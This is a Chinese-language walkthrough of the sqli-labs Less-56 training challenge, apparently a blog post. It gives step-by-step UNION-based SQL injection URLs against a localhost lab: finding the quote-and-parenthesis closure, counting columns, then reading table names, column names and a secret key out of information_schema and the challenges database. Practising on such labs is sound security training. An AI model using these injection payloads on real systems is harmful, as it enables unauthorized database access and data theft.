sqli-labs (less-56)

sqli-labs (less-56)

进入56关,输入id=1
sqli-labs (less-56)
这里我们依然有14次机会

http://127.0.0.1/sql1/Less-56/?id=1'--+ #回显错误
http://127.0.0.1/sql1/Less-56/?id=1')--+ #回显正常

sqli-labs (less-56)
所以闭合方式’)–+,并且为字符型注入

判断字段数

http://127.0.0.1/sql1/Less-56/?id=1') order by 3--+ #回显正常
http://127.0.0.1/sql1/Less-56/?id=1') order by 4--+ #回显错误

sqli-labs (less-56)
所以判断字段数为3

确定回显位置

http://127.0.0.1/sql1/Less-56/?id=-1') union select 1,2,3--+

sqli-labs (less-56)
查看当前库

http://127.0.0.1/sql1/Less-56/?id=-1') union select 1,2,database()--+

sqli-labs (less-56)
查看challenges库下的所有表

http://127.0.0.1/sql1/Less-56/?id=-1') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

sqli-labs (less-56)
查看g6asr4uvim表下的所有字段

http://127.0.0.1/sql1/Less-56/?id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='g6asr4uvim')--+

sqli-labs (less-56)
查看secret_NGJR字段下的值

http://127.0.0.1/sql1/Less-56/?id=-1') union select 1,2,(select group_concat(secret_NGJR) from challenges.g6asr4uvim)--+

sqli-labs (less-56)
将查询到的KEY提交
sqli-labs (less-56)
sqli-labs (less-56)
成功

上一篇:sql-labs继续闯关 5~10


下一篇:sqli-labs (less-58)